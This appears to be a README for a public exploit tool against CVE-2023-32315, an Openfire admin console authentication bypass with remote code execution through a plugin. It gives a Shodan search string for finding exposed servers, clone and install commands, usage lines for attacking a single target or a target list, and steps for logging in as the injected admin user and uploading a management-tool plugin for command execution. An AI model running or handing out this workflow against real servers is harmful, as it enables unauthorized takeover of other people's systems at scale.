CVE-2023-32315

Openfire Console Authentication Bypass Vulnerability with RCE plugin

Dorks

//Shodan
html:"jive-loginVersion"

Setup

git clone https://github.com/miko550/CVE-2023-32315.git
cd CVE-2023-32315
pip3 install -r requirements.txt

Usage

python3 CVE-2023-32315.py -t http://127.0.0.1:9090
python3 CVE-2023-32315.py -l lists.txt

Steps

  1. Run the exploit
  2. Log in with the newly added user
  3. Go to tab plugin > upload plugin openfire-management-tool-plugin.jar
  4. Go to tab server > server settings > Management tool